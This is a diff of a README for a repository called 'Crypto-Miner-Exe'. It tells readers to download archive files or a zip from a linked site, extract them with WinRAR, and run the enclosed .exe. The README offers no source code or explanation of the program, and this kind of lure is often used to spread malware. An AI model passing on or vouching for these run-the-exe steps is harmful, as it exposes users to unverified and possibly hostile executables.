Unknown18-afk/Crypto-Miner-Exe/README.md

 Contributions welcome!
 Follow Contributing Guidelines to get involved.

 **How To Download ?**
-1. Just Download Both Files
-2. Extract Any One File Using Winrar [ https://www.rarlab.com/download.htm ] It Will Give You One Exe Option 1: GitHub
+    Option 1: GitHub
 Download both files from the GitHub repository.
-- Extract any one file using WinRAR.
+- Extract any one file using WinRAR [ https://www.rarlab.com/download.htm ] .
 - It will give you an exe file, Run the Crypto-Miner-Exe Option 2: Website

-- Visit the website to download - [ https://unknown18-afk.github.io/Miner-Website18/ ]
+- Visit the website to download - [ https://unknown18-afk.github.io/Miner-Website18 ]
 - Extract the zip file and run the .exe.

 **Made By:-**